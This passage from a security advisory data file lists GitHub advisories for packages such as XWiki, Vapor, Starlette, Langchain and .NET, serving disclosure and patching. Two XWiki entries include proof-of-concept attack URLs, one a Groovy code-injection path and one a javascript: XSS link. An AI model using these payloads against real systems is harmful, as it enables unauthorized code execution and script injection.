'https://security.netapp.com/advisory/ntap-20230706-0005/'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/06/14/2'}]","{'cwe_ids': ['CWE-770'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-14T20:16:47Z', 'nvd_published_at': None}" 1.4.0,GHSA-6mf5-36v9-3h2w,2023-06-20T16:46:11Z,2023-06-20T16:46:11Z,,['CVE-2023-35150'],XWiki Platform vulnerable to privilege escalation (PR) from view right via Invitation application,"### Impact Any user with view rights on any document can execute code with programming rights, leading to remote code execution by crafting an url with a dangerous payload. See the example below: Open `/xwiki/bin/view/%5D%5D%20%7B%7Basync%20async%3D%22true%22%20cached%3D%22false%22%20context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22Hello%20%22%20%2B%20%22from%20groovy!%22)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D?sheet=Invitation.InvitationGuestActions&xpage=view` where `` is the URL of your XWiki installation. ### Patches The problem as been patching on XWiki 15.0, 14.10.4 and 14.4.8. ### Workarounds It is possible to partially fix the issue by applying this [patch](https://github.com/xwiki/xwiki-platform/commit/b65220a4d86b8888791c3b643074ebca5c089a3a). Note that some additional issue can remain and can be fixed automatically by a migration. Hence, it is advised to upgrade to one of the patched version instead of patching manually. ### References - https://jira.xwiki.org/browse/XWIKI-20285 ### For more information If you have any questions or comments about this advisory: * Open an issue in [Jira XWiki.org](https://jira.xwiki.org/) * Email us at [Security Mailing List](mailto:security@xwiki.org)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-invitation-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4-m-2'}, {'fixed': '14.4.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-invitation-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.5'}, {'fixed': '14.10.4'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-invitation-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '15.0-rc-1'}, {'fixed': '15.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-6mf5-36v9-3h2w'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35150'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/b65220a4d86b8888791c3b643074ebca5c089a3a'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20285'}]","{'cwe_ids': ['CWE-94', 'CWE-95'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-20T16:46:11Z', 'nvd_published_at': None}" 1.4.0,GHSA-vcvg-xgr8-p5gq,2023-06-09T19:31:32Z,2023-06-09T19:31:32Z,,['CVE-2020-15230'],Arbitrary file read using percent-encoded relative paths in FileMiddleware,"### Impact Attackers can access data at arbitrary filesystem paths on the same host as an application using `FileMiddleware`. ### Patches Version [4.29.4](https://github.com/vapor/vapor/releases/tag/4.29.4) ### Workarounds Upgrade to 4.24.4 or later, or disable `FileMiddleware`. ### References * Introduced in https://github.com/vapor/vapor/pull/2223 * Fixed by https://github.com/vapor/vapor/pull/2500 ### For more information If you have any questions or comments about this advisory: * Open [an issue](https://github.com/vapor/vapor/issues) * Email us at [security@vapor.codes](mailto:security@vapor.codes)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'purl-type:swift', 'name': 'github.com/vapor/vapor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0-rc.2.5'}, {'fixed': '4.29.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vapor/vapor/security/advisories/GHSA-vcvg-xgr8-p5gq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15230'}, {'type': 'WEB', 'url': 'https://github.com/vapor/vapor/pull/2500'}, {'type': 'WEB', 'url': 'https://github.com/vapor/vapor/commit/cf1651f7ff76515593f4d8ca6e6e15d2247fe255'}, {'type': 'PACKAGE', 'url': 'https://github.com/vapor/vapor'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-09T19:31:32Z', 'nvd_published_at': '2020-10-02T19:15:00Z'}" 1.4.0,GHSA-ccrc-9x59-3vc4,2023-07-06T21:39:44Z,2023-06-29T21:30:29Z,,['CVE-2020-26708'],requests-xml XML External Entity Injection vulnerability,requests-xml v0.2.3 was discovered to contain an XML External Entity Injection (XXE) vulnerability which allows attackers to execute arbitrary code via a crafted XML file.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'requests-xml'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.2.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26708'}, {'type': 'WEB', 'url': 'https://github.com/erinxocon/requests-xml/issues/7'}, {'type': 'PACKAGE', 'url': 'https://github.com/erinxocon/requests-xml'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/requests-xml/PYSEC-2023-96.yaml'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230908-0003/'}]","{'cwe_ids': ['CWE-611'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-30T20:36:25Z', 'nvd_published_at': None}" 1.4.0,GHSA-3x74-v64j-qc3f,2023-06-28T23:54:39Z,2023-06-13T18:30:39Z,2023-06-28T23:54:39Z,['CVE-2023-30179'],Withdrawn Advisory: CraftCMS Server-Side Template Injection vulnerability,"## Withdrawn This advisory has been withdrawn because the CVE has been disputed and the underlying vulnerability is likely invalid. This link is maintained to preserve external references. [According to maintainers of Craft CMS](https://github.com/github/advisory-database/pull/2443#issuecomment-1610634200), only administrators can access Settings, and those administrators may have business needs for their permissions. Additionally, the underlying issue likely has little to no real-world security impact. ## Original Description CraftCMS is vulnerable to Server-Side Template Injection (SSTI). An authenticated attacker can inject Twig Template to User Photo Location field when setting User Photo Location in User Settings, lead to Remote Code Execution.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'craftcms/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.4.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-30179'}, {'type': 'WEB', 'url': 'https://github.com/github/advisory-database/pull/2443'}, {'type': 'WEB', 'url': 'https://datnlq.gitbook.io/cve/craft-cms/cve-2023-30179-server-side-template-injection'}, {'type': 'PACKAGE', 'url': 'https://github.com/craftcms/cms'}]","{'cwe_ids': ['CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-14T16:47:17Z', 'nvd_published_at': None}" 1.4.0,GHSA-q9hg-9qj2-mxf9,2023-06-30T20:28:38Z,2023-06-20T17:42:16Z,,['CVE-2023-35162'],XWiki Platform vulnerable to cross-site scripting via xcontinue parameter in previewactions template,"### Impact Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It's possible to exploit the previewactions template to perform a XSS, e.g. by using URL such as: > /xwiki/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=previewactions.vm&xcontinue=javascript:alert(document.domain) This vulnerability exists since XWiki 6.1-rc-1. ### Patches The vulnerability has been patched in XWiki 14.10.5 and 15.1-rc-1. ### Workarounds It's possible to workaround the vulnerability by editing the template previewactions.vm to perform checks on it, but note that the appropriate fix involves new APIs that have been recently introduced in XWiki. See the referenced jira tickets. ### References * Jira ticket about the vulnerability: https://jira.xwiki.org/browse/XWIKI-20342 * Introduction of the macro used for fixing this type of vulnerability: https://jira.xwiki.org/browse/XWIKI-20583 * Commit containing the actual fix in the template: https://github.com/xwiki/xwiki-platform/commit/9f01166b1a8ee9639666099eb5040302df067e4d ### For more information If you have any questions or comments about this advisory: * Open an issue in [Jira XWiki.org](https://jira.xwiki.org/) * Email us at [Security Mailing List](mailto:security@xwiki.org) ### Attribution This vulnerability has been reported by René de Sain @renniepak. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-flamingo-skin-resources'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.1-rc-1'}, {'fixed': '14.10.5'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-flamingo-skin-resources'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '15.0-rc-1'}, {'fixed': '15.1-rc-1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-q9hg-9qj2-mxf9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35162'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/9f01166b1a8ee9639666099eb5040302df067e4d'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20342'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20583'}]","{'cwe_ids': ['CWE-79'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-20T17:42:16Z', 'nvd_published_at': None}" 1.4.0,GHSA-fqhp-rhm6-8rrj,2023-06-28T19:43:29Z,2023-06-21T21:30:25Z,,['CVE-2023-33289'],urlnorm vulnerable to Regular Expression Denial of Service,The urlnorm crate through 0.1.4 for Rust allows Regular Expression Denial of Service (ReDos) via a crafted URL to lib.rs.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'urlnorm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33289'}, {'type': 'WEB', 'url': 'https://gist.github.com/6en6ar/b118888dc739e8979038f24c8ac33611'}, {'type': 'PACKAGE', 'url': 'https://github.com/progscrape/urlnorm'}, {'type': 'WEB', 'url': 'https://lib.rs/crates/urlnorm'}]","{'cwe_ids': ['CWE-1333'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-21T21:58:09Z', 'nvd_published_at': None}" 1.4.0,GHSA-p2mf-q26j-3xmh,2023-06-27T17:15:10Z,2023-06-27T15:30:28Z,,['CVE-2023-3431'],PlantUML Improper Access Control vulnerability,Improper Access Control in GitHub repository plantuml/plantuml prior to 1.2023.9.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'net.sourceforge.plantuml:plantuml-mit'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2023.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3431'}, {'type': 'WEB', 'url': 'https://github.com/plantuml/plantuml/commit/fbe7fa3b25b4c887d83927cffb1009ec6cb8ab1e'}, {'type': 'PACKAGE', 'url': 'https://github.com/plantuml/plantuml'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/fa741f95-b53c-4ed7-b157-e32c5145164c'}]","{'cwe_ids': ['CWE-284'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-27T17:15:10Z', 'nvd_published_at': None}" 1.4.0,GHSA-gh66-fp7j-98v5,2023-06-28T22:34:08Z,2023-06-28T22:34:08Z,,['CVE-2023-34099'],Shopware improper mail validation vulnerability,"### Impact The mail validation in the registration process had some flaws, so it was possible to construct different mail addresses, that in the end result in the same address, which is shared by multiple accounts. ### Patches We recommend updating to the current version 5.7.18. You can get the update to 5.7.18 regularly via the Auto-Updater or directly via the release page. https://github.com/shopware5/shopware/releases/tag/v5.7.18 For older versions you can use the Security Plugin: https://store.shopware.com/en/swag575294366635f/shopware-security-plugin.html ### References https://docs.shopware.com/en/shopware-5-en/security-updates/security-update-06-2023","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'shopware/shopware'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.1.4'}, {'fixed': '5.7.18'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.7.17'}}]","[{'type': 'WEB', 'url': 'https://github.com/shopware/shopware/security/advisories/GHSA-gh66-fp7j-98v5'}, {'type': 'WEB', 'url': 'https://github.com/shopware5/shopware/security/advisories/GHSA-gh66-fp7j-98v5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34099'}, {'type': 'WEB', 'url': 'https://github.com/shopware5/shopware/commit/39cc714d9a0be33b43877044d0b88ea3c6b43f3d'}, {'type': 'WEB', 'url': 'https://docs.shopware.com/en/shopware-5-en/security-updates/security-update-06-2023'}, {'type': 'PACKAGE', 'url': 'https://github.com/shopware5/shopware'}, {'type': 'WEB', 'url': 'https://www.shopware.com/en/changelog-sw5/#5-7-18'}]","{'cwe_ids': ['CWE-754'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-28T22:34:08Z', 'nvd_published_at': None}" 1.4.0,GHSA-9m3v-v4r5-ppx7,2023-06-16T17:54:18Z,2023-06-06T16:43:01Z,,['CVE-2023-33957'],Notation vulnerable to denial of service from high number of artifact signatures,"### Impact An attacker who controls or compromises a registry can make the registry serve an infinite number of signatures for the artifact, causing a denial of service to the host machine running `notation verify`. ### Patches The problem has been fixed in the release [v1.0.0-rc.6](https://github.com/notaryproject/notation/releases/tag/v1.0.0-rc.6). Users should upgrade their notation packages to [v1.0.0-rc.6](https://github.com/notaryproject/notation/releases/tag/v1.0.0-rc.6) or above. ### Workarounds User should use secure and trusted container registries. ### Credits The `notation` project would like to thank Adam Korczynski (@AdamKorcz) for responsibly disclosing the issue found during an security audit (facilitated by OSTIF and sponsored by CNCF) and Shiwei Zhang (@shizhMSFT) for root cause analysis.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/notaryproject/notation'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.0-rc.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/notaryproject/notation/security/advisories/GHSA-9m3v-v4r5-ppx7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33957'}, {'type': 'WEB', 'url': 'https://github.com/notaryproject/notation/commit/ed22fde52f6d70ae0b53521bd28c9ccafa868c24'}, {'type': 'PACKAGE', 'url': 'https://github.com/notaryproject/notation'}, {'type': 'WEB', 'url': 'https://github.com/notaryproject/notation/releases/tag/v1.0.0-rc.6'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T16:43:01Z', 'nvd_published_at': None}" 1.4.0,GHSA-qj8w-rv5x-2v9h,2023-06-09T22:54:39Z,2023-06-01T03:30:24Z,2023-06-09T22:54:39Z,[],Duplicate Advisory: Starlette vulnerable to directory traversal,"## Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-v5gw-mw7f-84px. This link is maintained to preserve external references. ## Original Description Directory traversal vulnerability in Starlette versions 0.13.5 and later and prior to 0.27.0 allows a remote unauthenticated attacker to view files in a web service which was built using Starlette.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'starlette'}, 'ecosystem_specific': {'affected_functions': ['starlette.staticfiles.StaticFiles.lookup_path']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.13.5'}, {'fixed': '0.27.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/encode/starlette/security/advisories/GHSA-v5gw-mw7f-84px'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-29159'}, {'type': 'WEB', 'url': 'https://github.com/encode/starlette/commit/1797de464124b090f10cf570441e8292936d63e3'}, {'type': 'PACKAGE', 'url': 'https://github.com/encode/starlette'}, {'type': 'WEB', 'url': 'https://github.com/encode/starlette/releases/tag/0.27.0'}, {'type': 'WEB', 'url': 'https://jvn.jp/en/jp/JVN95981715/'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T02:01:03Z', 'nvd_published_at': None}" 1.4.0,GHSA-pqp3-8rrw-g8vm,2023-06-06T01:50:33Z,2023-06-06T01:50:33Z,,[],PocketMine-MP vulnerable to server crash with certain invalid JSON payloads in `LoginPacket` due to vulnerable dependency,"### Impact An attacker could crash the server by sending malformed JWT JSON in `LoginPacket` due to a security vulnerability in [`netresearch/jsonmapper`](https://github.com/cweiske/JsonMapper), due to improper checking for mapping JSON arrays and objects onto scalar model properties such as strings. ### Patches The problem was fixed in a fork of JsonMapper in dktapps/JsonMapper@a31902a31f5b6fdb832f57c0e3a3f16a3b41c012. PocketMine-MP releases 4.20.5 and 4.21.1 have been released with the fix. ### Workarounds - Users of PocketMine-MP source installations may manually install the patched version of JsonMapper by backporting commit pmmp/PocketMine-MP@09668a37d66c6023685a948b7550c918620e98f2. - A plugin may also be able to workaround this issue by using `DataPacketReceiveEvent` to attempt detection of suspicious payloads. An `ErrorException` will be thrown in the crash case, which can be caught by plugins. ### References cweiske/jsonmapper#210 ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'pocketmine/pocketmine-mp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.20.5'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'pocketmine/pocketmine-mp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.21.0'}, {'fixed': '4.21.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pmmp/PocketMine-MP/security/advisories/GHSA-pqp3-8rrw-g8vm'}, {'type': 'WEB', 'url': 'https://github.com/cweiske/jsonmapper/pull/210'}, {'type': 'WEB', 'url': 'https://github.com/pmmp/PocketMine-MP/commit/09668a37d66c6023685a948b7550c918620e98f2'}, {'type': 'WEB', 'url': 'https://github.com/pmmp/netresearch-jsonmapper/commit/a31902a31f5b6fdb832f57c0e3a3f16a3b41c012'}, {'type': 'PACKAGE', 'url': 'https://github.com/pmmp/PocketMine-MP'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T01:50:33Z', 'nvd_published_at': None}" 1.4.0,GHSA-rxmj-hg9v-vp3p,2023-06-09T19:32:11Z,2023-06-09T19:32:11Z,,['CVE-2021-36155'],Uncontrolled Resource Consumption in LengthPrefixedMessageReader,"### Impact Affected gRPC Swift clients and servers are vulnerable to uncontrolled resource consumption attacks. Excessive memory may be allocated when parsing messages. This can lead to a denial of service. ### Patches The problem has been fixed in 1.2.0. ### Workarounds No workaround is available. Users must upgrade.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'purl-type:swift', 'name': 'github.com/grpc/grpc-swift'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/grpc/grpc-swift/security/advisories/GHSA-rxmj-hg9v-vp3p'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-36155'}, {'type': 'WEB', 'url': 'https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=35303'}, {'type': 'PACKAGE', 'url': 'https://github.com/grpc/grpc-swift'}, {'type': 'WEB', 'url': 'https://github.com/grpc/grpc-swift/releases/tag/1.2.0'}]","{'cwe_ids': ['CWE-120', 'CWE-770'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-09T19:32:11Z', 'nvd_published_at': '2021-07-09T12:15:00Z'}" 1.4.0,GHSA-fqcv-rfp6-wv92,2023-06-14T16:42:14Z,2023-06-07T15:30:18Z,,['CVE-2023-3142'],Microweber Cross-site Scripting vulnerability,Microweber 1.3.4 and prior is vulnerable to stored cross-site scripting via an alert on the `Editing` page. This issue is fixed in commit 42efa981a2239d042d910069952d6276497bdcf1.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'microweber/microweber'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.3.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3142'}, {'type': 'WEB', 'url': 'https://github.com/microweber/microweber/commit/42efa981a2239d042d910069952d6276497bdcf1'}, {'type': 'PACKAGE', 'url': 'https://github.com/microweber/microweber'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/d00686b0-f89a-4e14-98d7-b8dd3f92a6e5'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-09T22:52:59Z', 'nvd_published_at': None}" 1.4.0,GHSA-6643-h7h5-x9wh,2023-06-27T22:19:47Z,2023-06-20T15:31:09Z,,['CVE-2023-34541'],Langchain vulnerable to arbitrary code execution,Langchain 0.0.171 is vulnerable to Arbitrary code execution in `load_prompt`.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'langchain'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.0.171'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34541'}, {'type': 'WEB', 'url': 'https://github.com/hwchase17/langchain/issues/4849'}, {'type': 'WEB', 'url': 'https://github.com/langchain-ai/langchain/issues/4849'}, {'type': 'PACKAGE', 'url': 'https://github.com/hwchase17/langchain'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/langchain/PYSEC-2023-92.yaml'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-21T22:09:21Z', 'nvd_published_at': None}" 1.4.0,GHSA-jrm6-h9cq-8gqw,2023-06-30T22:17:52Z,2023-06-30T22:17:52Z,,['CVE-2023-36810'],PyPDF2 quadratic runtime with malformed PDF missing xref marker,"### Impact An attacker who uses this vulnerability can craft a PDF which leads to unexpected long runtime. This quadratic runtime blocks the current process and can utilize a single core of the CPU by 100%. It does not affect memory usage. ### Patches https://github.com/py-pdf/pypdf/pull/808 ### Workarounds _Is there a way for users to fix or remediate the vulnerability without upgrading?_ ### References * [PyPDF2 PR #808](https://github.com/py-pdf/pypdf/pull/808) * [PyPDF2 Issue #582](https://github.com/py-pdf/pypdf/issues/582)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'PyPDF2'}, 'ecosystem_specific': {'affected_functions': ['PyPDF2.PdfFileReader.readNextEndLine']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.27.9'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.27.8'}}]","[{'type': 'WEB', 'url': 'https://github.com/py-pdf/pypdf/security/advisories/GHSA-jrm6-h9cq-8gqw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-36810'}, {'type': 'WEB', 'url': 'https://github.com/py-pdf/pypdf/issues/582'}, {'type': 'WEB', 'url': 'https://github.com/py-pdf/pypdf/pull/808'}, {'type': 'WEB', 'url': 'https://github.com/py-pdf/pypdf/commit/c6c56f550bb384e05f0139c796ba1308837d6373'}, {'type': 'PACKAGE', 'url': 'https://github.com/py-pdf/pypdf'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/07/msg00019.html'}]","{'cwe_ids': ['CWE-407'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-30T22:17:52Z', 'nvd_published_at': None}" 1.4.0,GHSA-555c-2p6r-68mm,2023-06-14T17:08:54Z,2023-06-14T17:08:54Z,,['CVE-2023-29331'],.NET Denial of Service vulnerability,"# Microsoft Security Advisory CVE-2023-29331: .NET Denial of Service vulnerability ## Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET 7.0 and .NET 6.0. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A vulnerability exists in .NET when processing X.509 certificates that may result in Denial of Service. Details: [KB5025823 ](https://support.microsoft.com/kb/5025823) ## Announcement Announcement for this issue can be found at https://github.com/dotnet/announcements/issues/257 ### Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. ## Affected software * Any .NET 7.0 application running on .NET 7.0.5 or earlier. * Any .NET 6.0 application running on .NET 6.0.16 or earlier. If your application uses the following package versions, ensure you update to the latest version of .NET. ### .NET 7 Package name | Affected version | Patched version ------------ | ---------------- | ------------------------- [Microsoft.Windows.Compatibility](https://www.nuget.org/packages/Microsoft.Windows.Compatibility) | >= 7.0.0, < 7.0.1 | 7.0.3 [System.Security.Cryptography.Pkcs](https://www.nuget.org/packages/System.Security.Cryptography.Pkcs) | >= 7.0.0, < 7.0.1 | 7.0.2 [Microsoft.NetCore.App.Runtime.linux-arm](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-arm) | >= 7.0.0, < 7.0.5 | 7.0.7 [Microsoft.NetCore.App.Runtime.linux-arm64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-arm64) | >= 7.0.0, < 7.0.5 | 7.0.7 [Microsoft.NetCore.App.Runtime.linux-musl-arm](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-musl-arm) | >= 7.0.0, < 7.0.5 | 7.0.7 [Microsoft.NetCore.App.Runtime.linux-musl-arm64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-musl-arm64) | >= 7.0.0, < 7.0.5 | 7.0.7 [Microsoft.NetCore.App.Runtime.linux-musl-x64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-musl-x64) | >= 7.0.0, < 7.0.5 | 7.0.7 [Microsoft.NetCore.App.Runtime.linux-x64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-x64) | >= 7.0.0, < 7.0.5 | 7.0.7 [Microsoft.NetCore.App.Runtime.osx-arm64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.osx-arm64) | >= 7.0.0, < 7.0.5 | 7.0.7 [Microsoft.NetCore.App.Runtime.osx-x64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.osx-x64) | >= 7.0.0, < 7.0.5 | 7.0.7 [Microsoft.NetCore.App.Runtime.win-arm](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-arm) | >= 7.0.0, < 7.0.5 | 7.0.7 [Microsoft.NetCore.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-arm64) | >= 7.0.0, < 7.0.5 | 7.0.7 [Microsoft.NetCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-x64) | >= 7.0.0, < 7.0.5 | 7.0.7 [Microsoft.NetCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-x86) | >= 7.0.0, < 7.0.5 | 7.0.7 ### .NET 6 Package name | Affected version | Patched version ------------ | ---------------- | ------------------------- [Microsoft.Windows.Compatibility](https://www.nuget.org/packages/Microsoft.Windows.Compatibility) | >= 6.0.0, < 6.0.4 | 6.0.6 [System.Security.Cryptography.Pkcs](https://www.nuget.org/packages/System.Security.Cryptography.Pkcs) | >= 6.0.0, < 6.0.2 | 6.0.3 